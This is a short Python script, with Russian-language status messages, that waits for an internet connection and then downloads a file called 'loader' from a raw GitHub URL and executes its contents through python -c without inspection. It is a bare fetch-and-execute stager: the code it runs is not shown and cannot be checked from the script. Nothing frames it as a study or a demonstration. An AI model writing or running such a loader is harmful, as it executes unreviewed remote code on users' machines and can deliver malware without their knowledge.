import time
import requests
import subprocess
import urllib.request
import os
os.system("cls")
def run_from_github(url):
    try:
        response = urllib.request.urlopen(url)
        script_content = response.read().decode('utf-8')
        subprocess.run(['python', '-c', script_content])
    except Exception as e:
        print(f"Ошибка при выполнении скрипта с GitHub: {e}")
def check_internet(url='http://www.google.com/', timeout=1):
    try:
        _ = requests.get(url, timeout=timeout)
        return True
    except requests.ConnectionError:
        return False

if not check_internet():
    print("Нет интернета🛑. Ожидание...")
    
while not check_internet():
    time.sleep(0.001)
    os.system("cls")
print("Интернет подключен!✅")
time.sleep(3)
github_url = "https://raw.githubusercontent.com/RBXROBLOXGAMER/python-tools/main/loader"
run_from_github(github_url)

